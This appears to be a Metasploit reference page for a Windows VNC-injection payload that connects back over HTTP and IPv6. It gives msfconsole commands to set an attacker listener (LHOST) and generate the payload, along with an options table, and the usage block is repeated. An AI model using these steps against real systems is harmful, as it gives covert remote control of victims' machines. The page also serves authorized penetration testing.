VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
Tunnel communication over HTTP and IPv6, Inject a VNC Dll via a reflective loader (staged)
Rank
- Normal
Authors
- sf < stephen_fewer [at] harmonysecurity.com >
- hdm < hdm [at] metasploit.com >
Vulnerability References
Similar Modules
- payload/windows/vncinject/bind_ipv6_tcp
- payload/windows/vncinject/bind_nonx_tcp
- payload/windows/vncinject/bind_tcp
- payload/windows/vncinject/find_tag
- payload/windows/vncinject/reverse_http
- payload/windows/vncinject/reverse_ipv6_tcp
- payload/windows/vncinject/reverse_nonx_tcp
- payload/windows/vncinject/reverse_ord_tcp
- payload/windows/vncinject/reverse_tcp
- payload/windows/vncinject/reverse_tcp_allports
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/vncinject/reverse_ipv6_http
msf payload(reverse_ipv6_http) > set LHOST [MY IP ADDRESS]
msf payload(reverse_ipv6_http) > generate
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/vncinject/reverse_ipv6_http
msf payload(reverse_ipv6_http) > set LHOST [MY IP ADDRESS]
msf payload(reverse_ipv6_http) > generate
Module Options
| AUTOVNC | Automatically launch VNC viewer if present (default: true) |
| EXITFUNC | Exit technique: none, thread, process, seh (default: process) |
| LHOST | The local listener hostname |
| LPORT | The local listener port (default: 8443) |
| VNCHOST | The local host to use for the VNC proxy (default: 127.0.0.1) |
| VNCPORT | The local port to use for the VNC proxy (default: 5900) |
| DisableCourtesyShell | Disables the Metasploit Courtesy shell |
| DisableSessionTracking | Disables the VNC payload from following the active session as users log in an out of the input desktop |
| ReverseListenerComm | The specific communication channel to use for this listener |
| SessionCommunicationTimeout | The number of seconds of no activity before this session should be killed |
| SessionExpirationTimeout | The number of seconds before this session should be forcible shut down |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |